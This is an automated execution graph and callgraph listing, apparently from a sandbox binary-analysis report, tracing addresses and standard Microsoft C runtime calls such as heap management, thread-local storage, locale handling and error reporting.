    execution_graph 1298 5648bc4 1299 5648bcd RtlFreeHeap 1298->1299 1300 5648bf6 ___free_lconv_num 1298->1300 1299->1300 1301 5648be2 1299->1301 1304 5648edb 1301->1304 1307 5654546 GetLastError 1304->1307 1306 5648be8 GetLastError 1306->1300 1321 5650e47 1307->1321 1309 565455b 1310 56545a9 SetLastError 1309->1310 1324 5650897 1309->1324 1310->1306 1314 5654582 1315 56545a0 1314->1315 1316 5654588 1314->1316 1342 5648bc4 1315->1342 1332 56545b5 1316->1332 1319 5654590 GetCurrentThreadId 1319->1310 1320 56545a6 1320->1310 1322 5650e5e TlsGetValue 1321->1322 1323 5650e5a 1321->1323 1322->1309 1323->1309 1326 565089e 1324->1326 1327 56508d9 1326->1327 1348 565b30e 1326->1348 1356 5651181 Sleep 1326->1356 1327->1310 1329 5650e66 1327->1329 1330 5650e80 TlsSetValue 1329->1330 1331 5650e7c 1329->1331 1330->1314 1331->1314 1333 56545c1 _doexit 1332->1333 1359 564f65a 1333->1359 1335 56545fe 1366 5654656 1335->1366 1338 564f65a _doexit 58 API calls 1339 565461f ___addlocaleref 1338->1339 1369 565465f 1339->1369 1341 565464a _doexit 1341->1319 1343 5648bcd RtlFreeHeap 1342->1343 1344 5648bf6 ___free_lconv_num 1342->1344 1343->1344 1345 5648be2 1343->1345 1344->1320 1346 5648edb __mtinitlocknum 56 API calls 1345->1346 1347 5648be8 GetLastError 1346->1347 1347->1344 1349 565b319 1348->1349 1353 565b334 1348->1353 1350 565b325 1349->1350 1349->1353 1352 5648edb __mtinitlocknum 57 API calls 1350->1352 1351 565b344 HeapAlloc 1351->1353 1354 565b32a 1351->1354 1352->1354 1353->1351 1353->1354 1357 56541f8 DecodePointer 1353->1357 1354->1326 1356->1326 1358 565420b 1357->1358 1358->1353 1360 564f67e EnterCriticalSection 1359->1360 1361 564f66b 1359->1361 1360->1335 1372 564f6e2 1361->1372 1363 564f671 1363->1360 1394 565308a 1363->1394 1597 564f7c4 LeaveCriticalSection 1366->1597 1368 5654618 1368->1338 1598 564f7c4 LeaveCriticalSection 1369->1598 1371 5654666 1371->1341 1373 564f6ee _doexit 1372->1373 1374 564f70d 1373->1374 1403 5656a3a 1373->1403 1382 564f730 _doexit 1374->1382 1445 56508df 1374->1445 1380 564f73a 1385 564f65a _doexit 58 API calls 1380->1385 1381 564f72b 1384 5648edb __mtinitlocknum 58 API calls 1381->1384 1382->1363 1384->1382 1387 564f741 1385->1387 1388 564f766 1387->1388 1389 564f74e 1387->1389 1391 5648bc4 ___free_lconv_num 58 API calls 1388->1391 1450 5650e88 1389->1450 1392 564f75a 1391->1392 1453 564f782 1392->1453 1395 5656a3a __FF_MSGBANNER 58 API calls 1394->1395 1396 5653092 1395->1396 1397 5656a97 __NMSG_WRITE 58 API calls 1396->1397 1398 565309a 1397->1398 1567 5653139 1398->1567 1402 564f67d 1402->1360 1456 565f0af 1403->1456 1405 5656a41 1406 5656a4e 1405->1406 1407 565f0af __NMSG_WRITE 58 API calls 1405->1407 1408 5656a97 __NMSG_WRITE 58 API calls 1406->1408 1410 564f6fc 1406->1410 1407->1406 1409 5656a66 1408->1409 1411 5656a97 __NMSG_WRITE 58 API calls 1409->1411 1412 5656a97 1410->1412 1411->1410 1413 5656ab5 __NMSG_WRITE 1412->1413 1414 5656bdc 1413->1414 1416 565f0af __NMSG_WRITE 55 API calls 1413->1416 1530 564e753 1414->1530 1418 5656ac8 1416->1418 1417 564f703 1442 5652f67 1417->1442 1419 5656be1 GetStdHandle 1418->1419 1420 565f0af __NMSG_WRITE 55 API calls 1418->1420 1419->1414 1423 5656bef 1419->1423 1421 5656ad9 1420->1421 1421->1419 1422 5656aeb 1421->1422 1422->1414 1478 565d3d6 1422->1478 1423->1414 1425 5656c28 WriteFile 1423->1425 1425->1414 1427 5656c49 1430 5654398 __invoke_watson 8 API calls 1427->1430 1428 5656b18 GetModuleFileNameW 1429 5656b38 1428->1429 1433 5656b48 __NMSG_WRITE 1428->1433 1431 565d3d6 __NMSG_WRITE 55 API calls 1429->1431 1432 5656c53 1430->1432 1431->1433 1433->1427 1434 5656b8e 1433->1434 1487 565eff1 1433->1487 1434->1427 1496 565ef85 1434->1496 1438 565ef85 __NMSG_WRITE 55 API calls 1439 5656bc5 1438->1439 1439->1427 1440 5656bcc 1439->1440 1505 565f0ef EncodePointer 1440->1505 1545 5652f33 GetModuleHandleExW 1442->1545 1447 56508ed 1445->1447 1448 564f724 1447->1448 1548 56493e2 1447->1548 1565 5651181 Sleep 1447->1565 1448->1380 1448->1381 1451 5650ea5 InitializeCriticalSectionAndSpinCount 1450->1451 1452 5650e98 1450->1452 1451->1392 1452->1392 1566 564f7c4 LeaveCriticalSection 1453->1566 1455 564f789 1455->1382 1457 565f0b9 1456->1457 1458 565f0c3 1457->1458 1459 5648edb __mtinitlocknum 58 API calls 1457->1459 1458->1405 1460 565f0df 1459->1460 1463 5654388 1460->1463 1466 565435d DecodePointer 1463->1466 1467 5654370 1466->1467 1472 5654398 IsProcessorFeaturePresent 1467->1472 1470 565435d __NMSG_WRITE 8 API calls 1471 5654394 1470->1471 1471->1405 1473 56543a3 1472->1473 1474 565422b __call_reportfault 7 API calls 1473->1474 1475 56543b8 1474->1475 1476 565118f ___raise_securityfailure GetCurrentProcess TerminateProcess 1475->1476 1477 5654387 1476->1477 1477->1470 1479 565d3ef 1478->1479 1480 565d3e1 1478->1480 1481 5648edb __mtinitlocknum 58 API calls 1479->1481 1480->1479 1485 565d408 1480->1485 1482 565d3f9 1481->1482 1483 5654388 __NMSG_WRITE 9 API calls 1482->1483 1484 5656b0b 1483->1484 1484->1427 1484->1428 1485->1484 1486 5648edb __mtinitlocknum 58 API calls 1485->1486 1486->1482 1491 565efff 1487->1491 1488 565f003 1489 565f008 1488->1489 1490 5648edb __mtinitlocknum 58 API calls 1488->1490 1489->1434 1492 565f033 1490->1492 1491->1488 1491->1489 1494 565f042 1491->1494 1493 5654388 __NMSG_WRITE 9 API calls 1492->1493 1493->1489 1494->1489 1495 5648edb __mtinitlocknum 58 API calls 1494->1495 1495->1492 1497 565ef9f 1496->1497 1499 565ef91 1496->1499 1498 5648edb __mtinitlocknum 58 API calls 1497->1498 1504 565efa9 1498->1504 1499->1497 1501 565efcb 1499->1501 1500 5654388 __NMSG_WRITE 9 API calls 1502 5656bae 1500->1502 1501->1502 1503 5648edb __mtinitlocknum 58 API calls 1501->1503 1502->1427 1502->1438 1503->1504 1504->1500 1506 565f123 ___crtIsPackagedApp 1505->1506 1507 565f1e2 IsDebuggerPresent 1506->1507 1508 565f132 LoadLibraryExW 1506->1508 1511 565f207 1507->1511 1512 565f1ec 1507->1512 1509 565f16f GetProcAddress 1508->1509 1510 565f149 GetLastError 1508->1510 1514 565f183 7 API calls 1509->1514 1520 565f1ff 1509->1520 1513 565f158 LoadLibraryExW 1510->1513 1510->1520 1516 565f1fa 1511->1516 1517 565f20c DecodePointer 1511->1517 1515 565f1f3 OutputDebugStringW 1512->1515 1512->1516 1513->1509 1513->1520 1518 565f1df 1514->1518 1519 565f1cb GetProcAddress EncodePointer 1514->1519 1515->1516 1516->1520 1521 565f233 DecodePointer DecodePointer 1516->1521 1528 565f24b 1516->1528 1517->1520 1518->1507 1519->1518 1522 564e753 __call_reportfault 6 API calls 1520->1522 1521->1528 1526 565f2d1 1522->1526 1523 565f26f DecodePointer 1523->1520 1524 565f283 DecodePointer 1524->1523 1527 565f28a 1524->1527 1526->1414 1527->1523 1529 565f29b DecodePointer 1527->1529 1528->1523 1528->1524 1529->1523 1531 564e75d IsProcessorFeaturePresent 1530->1531 1532 564e75b 1530->1532 1534 565bb3e 1531->1534 1532->1417 1537 565baed IsDebuggerPresent 1534->1537 1538 565bb02 ___raise_securityfailure 1537->1538 1543 56511a4 SetUnhandledExceptionFilter UnhandledExceptionFilter 1538->1543 1540 565bb0a ___raise_securityfailure 1544 565118f GetCurrentProcess TerminateProcess 1540->1544 1542 565bb27 1542->1417 1543->1540 1544->1542 1546 5652f5e ExitProcess 1545->1546 1547 5652f4c GetProcAddress 1545->1547 1547->1546 1549 564945d 1548->1549 1552 56493ee 1548->1552 1550 56541f8 __calloc_impl DecodePointer 1549->1550 1551 5649463 1550->1551 1553 5648edb __mtinitlocknum 57 API calls 1551->1553 1555 5649421 RtlAllocateHeap 1552->1555 1558 5649449 1552->1558 1559 56493f9 1552->1559 1560 56541f8 __calloc_impl DecodePointer 1552->1560 1563 5649447 1552->1563 1556 5649455 1553->1556 1554 5656a3a __FF_MSGBANNER 57 API calls 1554->1559 1555->1552 1555->1556 1556->1447 1557 5656a97 __NMSG_WRITE 57 API calls 1557->1559 1561 5648edb __mtinitlocknum 57 API calls 1558->1561 1559->1552 1559->1554 1559->1557 1562 5652f67 _doexit 3 API calls 1559->1562 1560->1552 1561->1563 1562->1559 1564 5648edb __mtinitlocknum 57 API calls 1563->1564 1564->1556 1565->1447 1566->1455 1568 56531ef _doexit 58 API calls 1567->1568 1569 56530a5 1568->1569 1570 56531ef 1569->1570 1571 56531fb _doexit 1570->1571 1572 564f65a _doexit 51 API calls 1571->1572 1573 5653202 1572->1573 1574 5653230 DecodePointer 1573->1574 1577 56532bb __initterm 1573->1577 1576 5653247 DecodePointer 1574->1576 1574->1577 1583 5653257 1576->1583 1590 5653309 1577->1590 1579 5653318 _doexit 1579->1402 1581 5653264 EncodePointer 1581->1583 1582 5653300 1584 5652f67 _doexit 3 API calls 1582->1584 1583->1577 1583->1581 1585 5653274 DecodePointer EncodePointer 1583->1585 1586 5653309 1584->1586 1588 5653286 DecodePointer DecodePointer 1585->1588 1587 5653316 1586->1587 1595 564f7c4 LeaveCriticalSection 1586->1595 1587->1402 1588->1583 1591 56532e9 1590->1591 1592 565330f 1590->1592 1591->1579 1594 564f7c4 LeaveCriticalSection 1591->1594 1596 564f7c4 LeaveCriticalSection 1592->1596 1594->1582 1595->1587 1596->1591 1597->1368 1598->1371 1623 56533b0 1624 56533e7 1623->1624 1625 56533da 1623->1625 1627 564e753 __call_reportfault 6 API calls 1624->1627 1626 564e753 __call_reportfault 6 API calls 1625->1626 1626->1624 1630 56533f7 __except_handler4 1627->1630 1628 565350f 1629 56534c4 __except_handler4 1629->1628 1631 56534ff 1629->1631 1632 564e753 __call_reportfault 6 API calls 1629->1632 1630->1628 1630->1629 1635 565344e __IsNonwritableInCurrentImage 1630->1635 1633 564e753 __call_reportfault 6 API calls 1631->1633 1632->1631 1633->1628 1678 5657492 RtlUnwind 1635->1678 1636 5653526 1637 564e753 __call_reportfault 6 API calls 1636->1637 1639 5653536 __except_handler4 1637->1639 1638 565348c __except_handler4 1638->1636 1640 564e753 __call_reportfault 6 API calls 1638->1640 1641 5653681 1639->1641 1642 565357b 1639->1642 1640->1636 1643 56536d4 1641->1643 1644 5653686 1641->1644 1679 565e1c6 1642->1679 1648 5652c29 __crtGetLocaleInfoA_stat GetLocaleInfoW 1643->1648 1677 565363c 1643->1677 1693 5652c29 1644->1693 1648->1677 1649 5653695 1655 5650897 __calloc_crt 58 API calls 1649->1655 1668 56536be 1649->1668 1650 56535a8 GetLastError 1652 56535b7 1650->1652 1650->1677 1651 5650897 __calloc_crt 58 API calls 1654 5653624 1651->1654 1656 565e1c6 ___crtGetLocaleInfoA 60 API calls 1652->1656 1653 564e753 __call_reportfault 6 API calls 1657 565364d 1653->1657 1659 5653651 1654->1659 1661 565362e 1654->1661 1662 56536a6 1655->1662 1660 56535cd 1656->1660 1658 5648bc4 ___free_lconv_num 58 API calls 1658->1677 1684 565e03e 1659->1684 1666 5650897 __calloc_crt 58 API calls 1660->1666 1660->1677 1664 5648bc4 ___free_lconv_num 58 API calls 1661->1664 1661->1677 1665 5652c29 __crtGetLocaleInfoA_stat GetLocaleInfoW 1662->1665 1662->1668 1664->1677 1665->1668 1669 56535e2 1666->1669 1668->1658 1668->1677 1675 565e1c6 ___crtGetLocaleInfoA 60 API calls 1669->1675 1669->1677 1670 5653712 1672 5654398 __invoke_watson 8 API calls 1670->1672 1671 565366e 1673 5648bc4 ___free_lconv_num 58 API calls 1671->1673 1671->1677 1674 565371c 1672->1674 1673->1677 1676 565360f 1675->1676 1676->1651 1676->1661 1677->1653 1678->1638 1697 564ca16 1679->1697 1688 565e04c 1684->1688 1685 565e050 1686 5653663 1685->1686 1687 5648edb __mtinitlocknum 58 API calls 1685->1687 1686->1670 1686->1671 1689 565e07b 1687->1689 1688->1685 1688->1686 1691 565e08a 1688->1691 1690 5654388 __NMSG_WRITE 9 API calls 1689->1690 1690->1686 1691->1686 1692 5648edb __mtinitlocknum 58 API calls 1691->1692 1692->1689 1694 5652c45 1693->1694 1695 5652c49 __crtGetLocaleInfoA_stat 1693->1695 1694->1649 1696 5652c4e GetLocaleInfoW 1695->1696 1696->1649 1698 564ca27 1697->1698 1699 564ca74 1697->1699 1718 565452e 1698->1718 1705 565e0e2 1699->1705 1702 564ca54 1702->1699 1738 5659b58 1702->1738 1706 5652c29 __crtGetLocaleInfoA_stat GetLocaleInfoW 1705->1706 1708 565e10e 1706->1708 1707 565e117 1709 564e753 __call_reportfault 6 API calls 1707->1709 1708->1707 1713 56493e2 _malloc 58 API calls 1708->1713 1716 565e144 __crtGetLocaleInfoA_stat 1708->1716 1710 565359b 1709->1710 1710->1650 1710->1676 1711 5652c29 __crtGetLocaleInfoA_stat GetLocaleInfoW 1712 565e182 1711->1712 1714 565e1a9 1712->1714 1717 565e19a WideCharToMultiByte 1712->1717 1713->1716 2008 5650879 1714->2008 1716->1707 1716->1711 1717->1714 1719 5654546 __getptd_noexit 58 API calls 1718->1719 1720 5654534 1719->1720 1721 564ca2d 1720->1721 1722 565308a _doexit 58 API calls 1720->1722 1721->1702 1723 5656ee3 1721->1723 1722->1721 1724 5656eef _doexit 1723->1724 1725 565452e ___crtGetLocaleInfoA 58 API calls 1724->1725 1726 5656ef8 1725->1726 1727 5656f27 1726->1727 1729 5656f0b 1726->1729 1728 564f65a _doexit 58 API calls 1727->1728 1730 5656f2e 1728->1730 1731 565452e ___crtGetLocaleInfoA 58 API calls 1729->1731 1750 5656f63 1730->1750 1733 5656f10 1731->1733 1735 5656f1e _doexit 1733->1735 1737 565308a _doexit 58 API calls 1733->1737 1735->1702 1737->1735 1739 5659b64 _doexit 1738->1739 1740 565452e ___crtGetLocaleInfoA 58 API calls 1739->1740 1741 5659b6e 1740->1741 1742 564f65a _doexit 58 API calls 1741->1742 1743 5659b80 1741->1743 1748 5659b9e 1742->1748 1745 5659b8e _doexit 1743->1745 1747 565308a _doexit 58 API calls 1743->1747 1744 5659bcb 2004 5659bf5 1744->2004 1745->1699 1747->1745 1748->1744 1749 5648bc4 ___free_lconv_num 58 API calls 1748->1749 1749->1744 1751 5656f42 1750->1751 1752 5656f6e ___addlocaleref ___removelocaleref 1750->1752 1754 5656f5a 1751->1754 1752->1751 1757 5656ce9 1752->1757 2003 564f7c4 LeaveCriticalSection 1754->2003 1756 5656f61 1756->1733 1758 5656d62 1757->1758 1761 5656cfe 1757->1761 1759 5656daf 1758->1759 1760 5648bc4 ___free_lconv_num 58 API calls 1758->1760 1782 5656dd8 1759->1782 1827 565f9df 1759->1827 1762 5656d83 1760->1762 1761->1758 1764 5656d2f 1761->1764 1769 5648bc4 ___free_lconv_num 58 API calls 1761->1769 1766 5648bc4 ___free_lconv_num 58 API calls 1762->1766 1767 5656d4d 1764->1767 1776 5648bc4 ___free_lconv_num 58 API calls 1764->1776 1771 5656d96 1766->1771 1772 5648bc4 ___free_lconv_num 58 API calls 1767->1772 1768 5648bc4 ___free_lconv_num 58 API calls 1768->1782 1773 5656d24 1769->1773 1770 5656e37 1774 5648bc4 ___free_lconv_num 58 API calls 1770->1774 1775 5648bc4 ___free_lconv_num 58 API calls 1771->1775 1777 5656d57 1772->1777 1787 565f2d5 1773->1787 1780 5656e3d 1774->1780 1781 5656da4 1775->1781 1783 5656d42 1776->1783 1784 5648bc4 ___free_lconv_num 58 API calls 1777->1784 1778 5648bc4 58 API calls ___free_lconv_num 1778->1782 1780->1751 1785 5648bc4 ___free_lconv_num 58 API calls 1781->1785 1782->1770 1782->1778 1815 565f772 1783->1815 1784->1758 1785->1759 1788 565f2e4 1787->1788 1814 565f3cd 1787->1814 1789 5648bc4 ___free_lconv_num 58 API calls 1788->1789 1792 565f2f5 1788->1792 1789->1792 1790 565f307 1791 565f319 1790->1791 1794 5648bc4 ___free_lconv_num 58 API calls 1790->1794 1795 565f32b 1791->1795 1796 5648bc4 ___free_lconv_num 58 API calls 1791->1796 1792->1790 1793 5648bc4 ___free_lconv_num 58 API calls 1792->1793 1793->1790 1794->1791 1797 565f33d 1795->1797 1798 5648bc4 ___free_lconv_num 58 API calls 1795->1798 1796->1795 1799 565f34f 1797->1799 1801 5648bc4 ___free_lconv_num 58 API calls 1797->1801 1798->1797 1800 565f361 1799->1800 1802 5648bc4 ___free_lconv_num 58 API calls 1799->1802 1803 565f373 1800->1803 1804 5648bc4 ___free_lconv_num 58 API calls 1800->1804 1801->1799 1802->1800 1805 565f385 1803->1805 1806 5648bc4 ___free_lconv_num 58 API calls 1803->1806 1804->1803 1807 565f397 1805->1807 1809 5648bc4 ___free_lconv_num 58 API calls 1805->1809 1806->1805 1808 565f3a9 1807->1808 1810 5648bc4 ___free_lconv_num 58 API calls 1807->1810 1811 565f3bb 1808->1811 1812 5648bc4 ___free_lconv_num 58 API calls 1808->1812 1809->1807 1810->1808 1813 5648bc4 ___free_lconv_num 58 API calls 1811->1813 1811->1814 1812->1811 1813->1814 1814->1764 1816 565f7d5 1815->1816 1817 565f77d 1815->1817 1816->1767 1818 565f78d 1817->1818 1819 5648bc4 ___free_lconv_num 58 API calls 1817->1819 1820 565f79f 1818->1820 1822 5648bc4 ___free_lconv_num 58 API calls 1818->1822 1819->1818 1821 565f7b1 1820->1821 1823 5648bc4 ___free_lconv_num 58 API calls 1820->1823 1824 565f7c3 1821->1824 1825 5648bc4 ___free_lconv_num 58 API calls 1821->1825 1822->1820 1823->1821 1824->1816 1826 5648bc4 ___free_lconv_num 58 API calls 1824->1826 1825->1824 1826->1816 1828 565f9ee 1827->1828 2002 5656dcd 1827->2002 1829 5648bc4 ___free_lconv_num 58 API calls 1828->1829 1830 565f9f6 1829->1830 1831 5648bc4 ___free_lconv_num 58 API calls 1830->1831 1832 565f9fe 1831->1832 1833 5648bc4 ___free_lconv_num 58 API calls 1832->1833 1834 565fa06 1833->1834 1835 5648bc4 ___free_lconv_num 58 API calls 1834->1835 1836 565fa0e 1835->1836 1837 5648bc4 ___free_lconv_num 58 API calls 1836->1837 1838 565fa16 1837->1838 1839 5648bc4 ___free_lconv_num 58 API calls 1838->1839 1840 565fa1e 1839->1840 1841 5648bc4 ___free_lconv_num 58 API calls 1840->1841 1842 565fa25 1841->1842 1843 5648bc4 ___free_lconv_num 58 API calls 1842->1843 1844 565fa2d 1843->1844 1845 5648bc4 ___free_lconv_num 58 API calls 1844->1845 1846 565fa35 1845->1846 1847 5648bc4 ___free_lconv_num 58 API calls 1846->1847 1848 565fa3d 1847->1848 1849 5648bc4 ___free_lconv_num 58 API calls 1848->1849 1850 565fa45 1849->1850 1851 5648bc4 ___free_lconv_num 58 API calls 1850->1851 1852 565fa4d 1851->1852 1853 5648bc4 ___free_lconv_num 58 API calls 1852->1853 1854 565fa55 1853->1854 1855 5648bc4 ___free_lconv_num 58 API calls 1854->1855 1856 565fa5d 1855->1856 1857 5648bc4 ___free_lconv_num 58 API calls 1856->1857 1858 565fa65 1857->1858 1859 5648bc4 ___free_lconv_num 58 API calls 1858->1859 1860 565fa6d 1859->1860 1861 5648bc4 ___free_lconv_num 58 API calls 1860->1861 1862 565fa78 1861->1862 1863 5648bc4 ___free_lconv_num 58 API calls 1862->1863 1864 565fa80 1863->1864 1865 5648bc4 ___free_lconv_num 58 API calls 1864->1865 1866 565fa88 1865->1866 1867 5648bc4 ___free_lconv_num 58 API calls 1866->1867 1868 565fa90 1867->1868 1869 5648bc4 ___free_lconv_num 58 API calls 1868->1869 1870 565fa98 1869->1870 1871 5648bc4 ___free_lconv_num 58 API calls 1870->1871 1872 565faa0 1871->1872 1873 5648bc4 ___free_lconv_num 58 API calls 1872->1873 1874 565faa8 1873->1874 1875 5648bc4 ___free_lconv_num 58 API calls 1874->1875 1876 565fab0 1875->1876 1877 5648bc4 ___free_lconv_num 58 API calls 1876->1877 1878 565fab8 1877->1878 1879 5648bc4 ___free_lconv_num 58 API calls 1878->1879 1880 565fac0 1879->1880 1881 5648bc4 ___free_lconv_num 58 API calls 1880->1881 1882 565fac8 1881->1882 1883 5648bc4 ___free_lconv_num 58 API calls 1882->1883 1884 565fad0 1883->1884 1885 5648bc4 ___free_lconv_num 58 API calls 1884->1885 1886 565fad8 1885->1886 1887 5648bc4 ___free_lconv_num 58 API calls 1886->1887 1888 565fae0 1887->1888 1889 5648bc4 ___free_lconv_num 58 API calls 1888->1889 1890 565fae8 1889->1890 1891 5648bc4 ___free_lconv_num 58 API calls 1890->1891 1892 565faf0 1891->1892 1893 5648bc4 ___free_lconv_num 58 API calls 1892->1893 1894 565fafe 1893->1894 1895 5648bc4 ___free_lconv_num 58 API calls 1894->1895 1896 565fb09 1895->1896 1897 5648bc4 ___free_lconv_num 58 API calls 1896->1897 1898 565fb14 1897->1898 1899 5648bc4 ___free_lconv_num 58 API calls 1898->1899 1900 565fb1f 1899->1900 1901 5648bc4 ___free_lconv_num 58 API calls 1900->1901 1902 565fb2a 1901->1902 1903 5648bc4 ___free_lconv_num 58 API calls 1902->1903 1904 565fb35 1903->1904 1905 5648bc4 ___free_lconv_num 58 API calls 1904->1905 1906 565fb40 1905->1906 1907 5648bc4 ___free_lconv_num 58 API calls 1906->1907 1908 565fb4b 1907->1908 1909 5648bc4 ___free_lconv_num 58 API calls 1908->1909 1910 565fb56 1909->1910 1911 5648bc4 ___free_lconv_num 58 API calls 1910->1911 1912 565fb61 1911->1912 1913 5648bc4 ___free_lconv_num 58 API calls 1912->1913 1914 565fb6c 1913->1914 1915 5648bc4 ___free_lconv_num 58 API calls 1914->1915 1916 565fb77 1915->1916 1917 5648bc4 ___free_lconv_num 58 API calls 1916->1917 1918 565fb82 1917->1918 1919 5648bc4 ___free_lconv_num 58 API calls 1918->1919 1920 565fb8d 1919->1920 1921 5648bc4 ___free_lconv_num 58 API calls 1920->1921 1922 565fb98 1921->1922 1923 5648bc4 ___free_lconv_num 58 API calls 1922->1923 1924 565fba3 1923->1924 1925 5648bc4 ___free_lconv_num 58 API calls 1924->1925 1926 565fbb1 1925->1926 1927 5648bc4 ___free_lconv_num 58 API calls 1926->1927 1928 565fbbc 1927->1928 1929 5648bc4 ___free_lconv_num 58 API calls 1928->1929 1930 565fbc7 1929->1930 1931 5648bc4 ___free_lconv_num 58 API calls 1930->1931 1932 565fbd2 1931->1932 1933 5648bc4 ___free_lconv_num 58 API calls 1932->1933 1934 565fbdd 1933->1934 1935 5648bc4 ___free_lconv_num 58 API calls 1934->1935 1936 565fbe8 1935->1936 1937 5648bc4 ___free_lconv_num 58 API calls 1936->1937 1938 565fbf3 1937->1938 1939 5648bc4 ___free_lconv_num 58 API calls 1938->1939 1940 565fbfe 1939->1940 1941 5648bc4 ___free_lconv_num 58 API calls 1940->1941 1942 565fc09 1941->1942 1943 5648bc4 ___free_lconv_num 58 API calls 1942->1943 1944 565fc14 1943->1944 1945 5648bc4 ___free_lconv_num 58 API calls 1944->1945 1946 565fc1f 1945->1946 1947 5648bc4 ___free_lconv_num 58 API calls 1946->1947 1948 565fc2a 1947->1948 1949 5648bc4 ___free_lconv_num 58 API calls 1948->1949 1950 565fc35 1949->1950 1951 5648bc4 ___free_lconv_num 58 API calls 1950->1951 1952 565fc40 1951->1952 1953 5648bc4 ___free_lconv_num 58 API calls 1952->1953 1954 565fc4b 1953->1954 1955 5648bc4 ___free_lconv_num 58 API calls 1954->1955 1956 565fc56 1955->1956 1957 5648bc4 ___free_lconv_num 58 API calls 1956->1957 1958 565fc64 1957->1958 1959 5648bc4 ___free_lconv_num 58 API calls 1958->1959 1960 565fc6f 1959->1960 1961 5648bc4 ___free_lconv_num 58 API calls 1960->1961 1962 565fc7a 1961->1962 1963 5648bc4 ___free_lconv_num 58 API calls 1962->1963 1964 565fc85 1963->1964 1965 5648bc4 ___free_lconv_num 58 API calls 1964->1965 1966 565fc90 1965->1966 1967 5648bc4 ___free_lconv_num 58 API calls 1966->1967 1968 565fc9b 1967->1968 1969 5648bc4 ___free_lconv_num 58 API calls 1968->1969 1970 565fca6 1969->1970 1971 5648bc4 ___free_lconv_num 58 API calls 1970->1971 1972 565fcb1 1971->1972 1973 5648bc4 ___free_lconv_num 58 API calls 1972->1973 1974 565fcbc 1973->1974 1975 5648bc4 ___free_lconv_num 58 API calls 1974->1975 1976 565fcc7 1975->1976 1977 5648bc4 ___free_lconv_num 58 API calls 1976->1977 1978 565fcd2 1977->1978 1979 5648bc4 ___free_lconv_num 58 API calls 1978->1979 1980 565fcdd 1979->1980 1981 5648bc4 ___free_lconv_num 58 API calls 1980->1981 1982 565fce8 1981->1982 1983 5648bc4 ___free_lconv_num 58 API calls 1982->1983 1984 565fcf3 1983->1984 1985 5648bc4 ___free_lconv_num 58 API calls 1984->1985 1986 565fcfe 1985->1986 1987 5648bc4 ___free_lconv_num 58 API calls 1986->1987 1988 565fd09 1987->1988 1989 5648bc4 ___free_lconv_num 58 API calls 1988->1989 1990 565fd17 1989->1990 1991 5648bc4 ___free_lconv_num 58 API calls 1990->1991 1992 565fd22 1991->1992 1993 5648bc4 ___free_lconv_num 58 API calls 1992->1993 1994 565fd2d 1993->1994 1995 5648bc4 ___free_lconv_num 58 API calls 1994->1995 1996 565fd38 1995->1996 1997 5648bc4 ___free_lconv_num 58 API calls 1996->1997 1998 565fd43 1997->1998 1999 5648bc4 ___free_lconv_num 58 API calls 1998->1999 2000 565fd4e 1999->2000 2001 5648bc4 ___free_lconv_num 58 API calls 2000->2001 2001->2002 2002->1768 2003->1756 2007 564f7c4 LeaveCriticalSection 2004->2007 2006 5659bfc 2006->1743 2007->2006 2009 5650894 2008->2009 2010 5650883 2008->2010 2009->1707 2010->2009 2011 5648bc4 ___free_lconv_num 58 API calls 2010->2011 2011->2009 1599 56493e2 1600 564945d 1599->1600 1603 56493ee 1599->1603 1601 56541f8 __calloc_impl DecodePointer 1600->1601 1602 5649463 1601->1602 1604 5648edb __mtinitlocknum 57 API calls 1602->1604 1606 5649421 RtlAllocateHeap 1603->1606 1609 5649449 1603->1609 1610 56493f9 1603->1610 1611 56541f8 __calloc_impl DecodePointer 1603->1611 1614 5649447 1603->1614 1607 5649455 1604->1607 1605 5656a3a __FF_MSGBANNER 57 API calls 1605->1610 1606->1603 1606->1607 1608 5656a97 __NMSG_WRITE 57 API calls 1608->1610 1612 5648edb __mtinitlocknum 57 API calls 1609->1612 1610->1603 1610->1605 1610->1608 1613 5652f67 _doexit 3 API calls 1610->1613 1611->1603 1612->1614 1613->1610 1615 5648edb __mtinitlocknum 57 API calls 1614->1615 1615->1607 1616 564e762 1617 564e781 RaiseException 1616->1617 1619 5600ac9 1620 5600af1 1619->1620 1621 5600ad2 1619->1621 1620->1621 1622 5600afb GetModuleFileNameW 1620->1622 1622->1621

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    callgraph 0 Function_05652B65 1 Function_05652F67 66 Function_05652F33 1->66 2 Function_05650E66 3 Function_05660FE5 4 Function_0564E762 5 Function_05656F63 15 Function_05656CE9 5->15 37 Function_05656E43 5->37 40 Function_05656C54 5->40 6 Function_056493E2 6->1 28 Function_056541F8 6->28 53 Function_05648EDB 6->53 70 Function_05656A3A 6->70 91 Function_05656A97 6->91 7 Function_0564F6E2 7->1 30 Function_05648BC4 7->30 43 Function_05653350 7->43 47 Function_056508DF 7->47 51 Function_0564F65A 7->51 7->53 7->70 80 Function_0564F782 7->80 85 Function_05650E88 7->85 89 Function_05653395 7->89 7->91 8 Function_05656EE3 8->5 8->43 8->51 52 Function_05656F5A 8->52 57 Function_0565452E 8->57 88 Function_0565308A 8->88 8->89 9 Function_05657462 10 Function_0565E0E2 10->6 26 Function_05650879 10->26 36 Function_0565D440 10->36 44 Function_0564E753 10->44 58 Function_05652C29 10->58 11 Function_0565BAED 54 Function_056511A4 11->54 78 Function_0565E200 11->78 81 Function_0565118F 11->81 12 Function_0565F0EF 12->44 64 Function_05650EB6 12->64 13 Function_056531EF 13->1 31 Function_0564F7C4 13->31 13->43 13->51 72 Function_05653185 13->72 83 Function_05653309 13->83 13->89 14 Function_05648EEE 24 Function_0565F772 15->24 15->30 39 Function_0565F2D5 15->39 48 Function_0565F9DF 15->48 16 Function_0554DADA 17 Function_05659BF5 17->31 18 Function_0564E8F5 19 Function_0565EFF1 19->53 84 Function_05654388 19->84 20 Function_05657370 20->3 73 Function_05661004 20->73 21 Function_0565DEF0 22 Function_05656A73 23 Function_056664F0 24->30 25 Function_055446CE 26->30 27 Function_05657479 27->3 29 Function_05603DFE 30->14 30->53 32 Function_05650E47 33 Function_05654546 33->2 33->30 33->32 62 Function_056545B5 33->62 92 Function_05650897 33->92 34 Function_0565E1C6 34->10 90 Function_0564CA16 34->90 35 Function_0565DF40 35->21 79 Function_0565E000 35->79 38 Function_05600AC9 39->30 41 Function_05654656 41->31 42 Function_0565D3D6 42->53 42->84 44->11 45 Function_0565435D 45->45 95 Function_05654398 45->95 46 Function_0565465F 46->31 47->6 76 Function_05651181 47->76 48->30 49 Function_05659B58 49->17 49->30 49->43 49->51 49->57 49->88 49->89 50 Function_0564F7D9 50->18 50->43 50->89 51->7 51->88 52->31 53->33 55 Function_0564F1A6 56 Function_0565F0AF 56->53 